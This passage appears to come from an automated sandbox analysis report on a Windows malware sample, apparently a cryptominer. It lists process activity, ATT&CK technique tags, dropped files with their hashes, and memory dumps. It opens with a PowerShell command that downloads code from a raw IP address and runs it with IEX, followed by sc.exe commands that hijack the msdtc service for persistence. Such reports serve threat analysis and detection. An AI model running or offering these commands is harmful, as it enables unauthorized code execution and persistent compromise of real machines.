"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c "IEX ((new-object net.webclient).downloadstring('http://111.90.158.40/kill.png?random=20240328084740'))"
3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:532

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" config msdtc obj= localsystem
3⤵
- Launches sc.exe
PID:3812

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" failure msdtc reset= 600 actions= restart/600000/restart/600000/restart/600000
3⤵
- Launches sc.exe
PID:2444

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" config msdtc start= auto
3⤵
- Launches sc.exe
PID:4804

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" start msdtc
3⤵
- Launches sc.exe
PID:4408

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2yfb4ydx.v3w.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\run.bat
Filesize
124B

MD5
5b805b279c3ffaf3c58774a2a6af6382

SHA1
338d2fac6e97459229f8924ea95f4b187bef2ba7

SHA256
0b7eaf4a089500eceadcbbe2f3b4c808ca23db7935a79ebcf41c810506c09d9c

SHA512
aa0c2c87c8cfa4b82c136d8e84dae9d9641cacec5cd3767e8443af7d5cc53ff898f40c320e6991b07b0c7304f44fb7aabb2661aac375a3d4e47911879c3c2521

Download Submit
C:\Windows\Fonts\WinRing0x64.sys
Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Windows\Fonts\config.json
Filesize
1KB

MD5
e0dc65dbfbf42f6dd4b2c3645dc00fec

SHA1
02b449bedb5d94cd3e64d279038b5d992d3e2eac

SHA256
c1f454826119be38e3ffb0346572631ca5e81b1b075f8b2359d5afbb4e215860

SHA512
46a03979c1865d1c8fffdc066f3c172ece51f4670e5eea8443fba6fe3d6b2eadf676cdda9e32ca14bf912095960236034cc1116b0230ca6cc5b28205b76e58ff

Download Submit
C:\Windows\Fonts\curl.exe
Filesize
479KB

MD5
69cac8a16eb9fdcdb1a1617842fd8dd9

SHA1
c66e0065431bd034e366d98722a5cb1cdfedbb56

SHA256
52ff78c647d18ca68552dea4e1b51c7582e3b1302af171a97ca641d3562f0561

SHA512
42bbee0702477e65c29740867faa92bb4aadba84bc98e00eb008441810520debb91a9bbe51e19d348ba651cab1ac9825b11d7235799d60531ad8ec9949c329b8

Download Submit
C:\Windows\Fonts\smartsscreen.exe.tmp2
Filesize
4.2MB

MD5
18957d83337a7f6a879d739be02b173e

SHA1
125982676af23e93fa58b31ef1bdb93725cb91c3

SHA256
2fe78941d74d35f721556697491a438bf3573094d7ac091b42e4f59ecbd25753

SHA512
47e9029e8def90a17884423e3caa98a4f99f7e08397074c6a49b7130a464b9bd6406dbf3dac75f48483cc80cc155f6f2a47bdd58a5084230163ca16d1d8c77f9

Download Submit
C:\Windows\Fonts\taskhostw.exe
Filesize
5.4MB

MD5
bd877072c51ee58ec7aaf091bff0b80c

SHA1
41fce204948df6af1fe2f3f6dec02086678eab3b

SHA256
35eb368c14ad25e3b1c58579ebaeae71bdd8ef7f9ccecfc00474aa066b32a03f

SHA512
27e90612a735f1296dd3a80b7538a780b8a2d30a2f63782e90dda1a12ca070d701c077719c50ded4fdbe68af511f5767015efe1137620b955e0ace2ab397f655

Download Submit
C:\Windows\Fonts\taskhostw.exe
Filesize
3.7MB

MD5
1f810dba55857b54599ff5436cb258ec

SHA1
c5e6b79e8528a073b65b5600daf7741556da9e93

SHA256
3f3ec59061fd4405170c1eef3c6bd00d04eeb8ee87c66e052fae8405808f380b

SHA512
55e7f0e417fc0dcc7b7bdcf61ce644ef935da531c20485499e09d38dadee4feec300fd8683d0ec16a168981b78257a7d377c6ed26345baee45365fc8ead9b802

Download Submit
C:\Windows\LOGS\DPX\setupact.log
Filesize
1KB

MD5
7a4ab2fae81fa5d89a8b362ecfba0460

SHA1
eff033e11466317e767242b33b7c8f7c37b2b73a

SHA256
bb6b4b4b7d34ea68572955d58ff6a9682470f7cf9b94f0bb9ef461c9471c2580

SHA512
57dd3b9642cd5b2b0589e7ecc2088f9043dde7f2d7e16dfd9deaba5a42878ca7649a03ad7e94404bd1a394bebe5ee2e1b59231aaa29337cc71d79bab6791ff1b

Download Submit
C:\Windows\LOGS\DPX\setupact.log
Filesize
2KB

MD5
e8b7b043ae574a823840f99fe5ae90d9

SHA1
733700495551ff00fbe472d088f0ee2f619afe35

SHA256
4a8ed8864ba38cd83351a2eba5d2042daa633d60d1d41af62a02f5bfe6ec727f

SHA512
cc7f24ace714ded6cd4669a9cbaffa4a7096d2bb2963b3c7d91d6c9bb5229b02b1139af244d6283f17fe8b8d0565f80019318cbf6681a5c9004b8c0b9f09b4cc

Download Submit
C:\Windows\LOGS\DPX\setupact.log
Filesize
3KB

MD5
055621301b4277dd17b3ea9d4cdb32b4

SHA1
41b849008952b64744350b6cd4d889348efe5ffb

SHA256
109a45bed9f32527b6a0939fd7fcf3d5bbc02c691cd796d781036e430778f0b0

SHA512
174d7e267855edc032bdb566833ff531d0a9a86b37d0e7c7d9e69640460bb50a547ee969c87571cf7f8684fbf1ffa0b570faa6d312e7976906bc12441343a5c4

Download Submit
C:\Windows\LOGS\DPX\setupact.log
Filesize
4KB

MD5
9c86c29e172a60a42777e11939101197

SHA1
2f9f565a97573a571beb7879b90cbd0f8b0f2cb4

SHA256
d531512adc74943b7a38b50b0ecddefe2662064117b10ba0eb9ecaf587bcaa92

SHA512
d55e6735b81c0293edb02b14b609a2b3980346f242f09ad46de79b1f3fafce6a31f403b7821a673ed8de730da35d18381352c1c2a71d3ef2a0e37fcac5740b43

Download Submit
C:\Windows\LOGS\DPX\setupact.log
Filesize
6KB

MD5
bfa5a4c3c9741bbe59e13e41e0203dbb

SHA1
0df8ed26bd08044064e4c6616c61287118bf5656

SHA256
7e1cf0cd7cb3899df192280320987e1407e5f23601a4025c4ab8a505cd8bb619

SHA512
1c62d514bda5a1ca445c97818133cfac84238ff552305bd454b70173c0a6466c6fbcc4da61b4304d30b1af3b72ffa6b1f4f1bac80604efe5d117aba0968a0b54

Download Submit
C:\Windows\Logs\DPX\setupact.log
Filesize
6KB

MD5
42f521f07589e44717c5188cfc021f0d

SHA1
cc76696fc7647768faf736967d5d136c3ff6439a

SHA256
1f7429997efdcf151b75189c78c22b7e1107eb3b66bfa6a92c319516941fda27

SHA512
9fb02439eef8578be75c6f9cd280a496b0c27ef0709bfbb8e3cc2c0e7080d89f6aba5d6c07273a73bce4c88ab4dfd1ca8418e77ca3ae965c66c1bc65144ecf53

Download Submit
C:\Windows\System32\drivers\IObitUnlockers.sys
Filesize
35KB

MD5
d7b749051da5fb4604f4141f19c47660

SHA1
288daefd1ce65fb01011dc8a64491111207d3965

SHA256
2b33df9aff7cb99a782b252e8eb65ca49874a112986a1c49cd9971210597a8ae

SHA512
1d0ac1854eb6f2a5d2d90424bc5b9dd989ad61a2f3e87d6e9ca97a7f5f7c0d38b387cfd3e16b14992ea263b5d4194b0d38b8b8a6f5b1d0829a6932fde127c193

Download Submit
C:\Windows\System32\drivers\aswArPots.sys
Filesize
203KB

MD5
a179c4093d05a3e1ee73f6ff07f994aa

SHA1
5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4

SHA256
4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1

SHA512
788682500c548fa55a3ac6b0bc3f9fe77c2d1695f7bce808269b4aa2842450295c87981669ece74f8591e1b51045e4071d0ca61362eb3a02bd6ad2041f9a8918

Download Submit
C:\Windows\System32\oci.dll
Filesize
303KB

MD5
4c8e4c5c0e150c210cd2014a84e39ec6

SHA1
d6dfce664ee28cdcf143da2ec71d2a0ff18c1280

SHA256
3ced0552b9ecf3dfecd14cbcc3a0d246b10595d5048d7f0d4690e26ecccc1150

SHA512
d2366618edc0aa990940947304b38622b6538c2007ef370df3d9bd7be5eb64234e949729884b983cd8e82b6c166b030b6404c4bcdd7880213ba9d240ac45f30e

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
fe7b9ec4fffe2c61a55e532d2f12dc91

SHA1
df60e82112d70c9c826bd49575e78612f056d7b5

SHA256
723b1b1613ea97134c9e08cae8453315e259f2f1092e2a487ea3f6277d3b106d

SHA512
ec84da92b2549a11403dcfd2f48eb2d83a62d87f2aadb851da52a2a0e659faae6e9eee33610373799171a55b43c2c905d9a85ffacae464d7e0931dfa8c2c907e

Download Submit
\??\c:\windows\fonts\curl.exe.tmp
Filesize
263KB

MD5
eca70588d25cef61c5f903ed6e275709

SHA1
018afdb9359585efe15f173b2d9168880de27204

SHA256
95d0c1184cf8d22f466ef9a25e98662b9cc33e054658453bf1a152bf5e5fc4c1

SHA512
aa315b61191f7548c95252aa37c38ddc38bfc8bf57f2774b61e87cbdb78b13d3a68611f3a5a9b8f0d33aa477d8dfdf0df4b5b45214b5649a8489b3c35723ba9b

Download Submit
\??\c:\windows\fonts\smartsscreen.exe.tmp
Filesize
1.8MB

MD5
c3834835873b9d7d6b9a2436f748aa51

SHA1
3855c5e50e59c8931c7c0469075590aed54cf71b

SHA256
792842443deca9bbd306ddee49bb0c8c9ceace2eb89042291a628ffff2c4eab3

SHA512
c93bbc45fd0b0789a52b8eb756675176244a374c40dacbfc4aa1910938d75916616fa8ecc021ed51815e0f6bb4b2ede8790134393bf7f497a98c502cd2a77ee5

Download Submit
\??\c:\windows\fonts\taskhostw.png
Filesize
2.3MB

MD5
dc6cd17105168171c27fb167239636e1

SHA1
5cfc86dd2ca119f056e5561dddf36a1a8aa3c32e

SHA256
c5795c4ae2cc1ce89bf8421241bc9e7e926e38e065eb1bbb7a7771fbb78d3cc1

SHA512
a784b051f96bfaa5d830f9efeb0d5b5a071b251fa0852975bd4c3c5439b6661e28d0dc79aa298d93905603641b8497bbb2124d590f820ddb9823b7979c9c7f9b

Download Submit
\??\c:\windows\fonts\winring0x64.png
Filesize
7KB

MD5
8d31ae369e67ee0b412d889299f2b4b2

SHA1
c643a490023aa45806760a1b84d15c434a326e0b

SHA256
be6b20e6a49225144e918e3607684f8bebbf190aa30ef2f42f06a8eb4fdaef6f

SHA512
7f312046908556fd24335b2cb93410bb3b158932eb66b6c20ee8336748e68463b3d6ca8dfa4ad303ee7193560e0c9b4f22bb6397ac5ea9e2e0e8fc82be95bbd5

Download Submit
\??\c:\windows\system32\drivers\aswarpots.sys.tmp
Filesize
111KB

MD5
851284b85aca7d8e966f3f0dcf9aa33b

SHA1
916747a0c17c3e5ba931b259153ff67c071b991e

SHA256
fdca346264db6c2c112f3661b7a41314ec048fc08e97ef1842e298f361ecede6

SHA512
4435796dbf945b6331ff281146d1785ff7258f95b97e56f463a29f43effac74b5e0a31889da315c9b258890083832dbbd0ed58a7245c1afae2edad85139ccc63

Download Submit
\??\c:\windows\system32\drivers\iobitunlockers.sys.tmp
Filesize
18KB

MD5
aa8ffe5d6495afb8515e1b7c27a7a4ac

SHA1
ee01a179597c5580923864f39040e4cba6a6659f

SHA256
1ca472a087279a36ec239c953ad249d358d7b6b7a0941fdcdb9f02518f320d0f

SHA512
e3ddf29b26e3d41f88a72778a2caac6ab5d883e61552c4e136774e6103e2ebf6023431a1df0358bbc07f999b0d0b0ff2ddd2adfa5b41a19dc4ffac91687e0322

Download Submit
\??\c:\windows\system32\oci.dll.tmp
Filesize
148KB

MD5
1801337ff3c1cbec9b97ed0f7b79ac0b

SHA1
3319998596f05e3688fba71faf7ad3d6063d23c8

SHA256
0d2039d41bc4261c2f59dff7500af5d628c57889f2e0e557d87c71ed2e852b25

SHA512
f230ffa10699461f23a1889be5a1b63a8b475ab983af67a010e1f7abde7d19a6d1251c9625a2a35b9109fc95858499c68f0b4e3fc060da55ca2ad169e63811f6

Download Submit
memory/532-164-0x000002E8A78B0000-0x000002E8A78C0000-memory.dmp

Filesize
64KB

Download
memory/532-163-0x00007FFB14240000-0x00007FFB14D01000-memory.dmp

Filesize
10.8MB

Download
memory/532-167-0x000002E8A78B0000-0x000002E8A78C0000-memory.dmp

Filesize
64KB

Download
memory/532-176-0x00007FFB14240000-0x00007FFB14D01000-memory.dmp

Filesize
10.8MB

Download
memory/532-175-0x000002E8A78B0000-0x000002E8A78C0000-memory.dmp

Filesize
64KB

Download
memory/956-11-0x000002546AC50000-0x000002546AC60000-memory.dmp

Filesize
64KB

Download
memory/956-90-0x00007FFB14240000-0x00007FFB14D01000-memory.dmp

Filesize
10.8MB

Download
memory/956-9-0x000002546ABB0000-0x000002546ABD2000-memory.dmp

Filesize
136KB

Download
memory/956-13-0x000002546AC50000-0x000002546AC60000-memory.dmp

Filesize
64KB

Download
memory/956-10-0x00007FFB14240000-0x00007FFB14D01000-memory.dmp

Filesize
10.8MB

Download
memory/956-67-0x000002546AC50000-0x000002546AC60000-memory.dmp

Filesize
64KB

Download
memory/956-72-0x000002546AC50000-0x000002546AC60000-memory.dmp

Filesize
64KB

Download
memory/956-12-0x000002546AC50000-0x000002546AC60000-memory.dmp

Filesize
64KB

Download
memory/956-81-0x000002546AC50000-0x000002546AC60000-memory.dmp

Filesize
64KB

Download
memory/956-57-0x00007FFB14240000-0x00007FFB14D01000-memory.dmp

Filesize
10.8MB

Download
memory/956-70-0x000002546AC50000-0x000002546AC60000-memory.dmp

Filesize
64KB

Download
memory/1596-54-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/1596-59-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/2072-174-0x00000000001E0000-0x0000000000200000-memory.dmp

Filesize
128KB

Download
memory/2072-177-0x00000000014B0000-0x00000000014D0000-memory.dmp

Filesize
128KB

Download
memory/2072-178-0x00000000015D0000-0x00000000015F0000-memory.dmp

Filesize
128KB

Download
memory/2072-181-0x00000000015D0000-0x00000000015F0000-memory.dmp

Filesize
128KB

Download
memory/4272-145-0x0000017AED620000-0x0000017AED628000-memory.dmp

Filesize
32KB

Download
memory/4272-134-0x0000017AED520000-0x0000017AED53C000-memory.dmp

Filesize
112KB

Download
memory/4272-172-0x00007FFB14240000-0x00007FFB14D01000-memory.dmp

Filesize
10.8MB

Download
memory/4272-140-0x0000017AED630000-0x0000017AED64C000-memory.dmp

Filesize
112KB

Download
memory/4272-141-0x0000017AED610000-0x0000017AED61A000-memory.dmp

Filesize
40KB

Download
memory/4272-106-0x00007FFB14240000-0x00007FFB14D01000-memory.dmp

Filesize
10.8MB

Download
memory/4272-144-0x0000017AED670000-0x0000017AED68A000-memory.dmp

Filesize
104KB

Download
memory/4272-135-0x0000017AED540000-0x0000017AED5F5000-memory.dmp

Filesize
724KB

Download
memory/4272-146-0x0000017AED650000-0x0000017AED656000-memory.dmp

Filesize
24KB

Download
memory/4272-147-0x0000017AED660000-0x0000017AED66A000-memory.dmp

Filesize
40KB

Download
memory/4272-124-0x00007FF49B090000-0x00007FF49B0A0000-memory.dmp

Filesize
64KB

Download
memory/4272-107-0x0000017AEC7B0000-0x0000017AEC7C0000-memory.dmp

Filesize
64KB

Download
memory/4272-123-0x0000017AEC7B0000-0x0000017AEC7C0000-memory.dmp

Filesize
64KB

Download
memory/4272-136-0x0000017AED600000-0x0000017AED60A000-memory.dmp

Filesize
40KB

Download
memory/4272-108-0x0000017AEC7B0000-0x0000017AEC7C0000-memory.dmp

Filesize
64KB

Download
memory/4332-143-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/4332-139-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/4700-40-0x00007FFB14240000-0x00007FFB14D01000-memory.dmp

Filesize
10.8MB

Download
memory/4700-55-0x0000027CFEF90000-0x0000027CFEFA0000-memory.dmp

Filesize
64KB

Download
memory/4700-42-0x0000027CFEF90000-0x0000027CFEFA0000-memory.dmp

Filesize
64KB

Download
memory/4700-43-0x0000027CFEF90000-0x0000027CFEFA0000-memory.dmp

Filesize
64KB

Download
memory/4700-56-0x00007FFB14240000-0x00007FFB14D01000-memory.dmp

Filesize
10.8MB

Download
memory/4848-122-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/4848-120-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/4912-71-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/4912-83-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download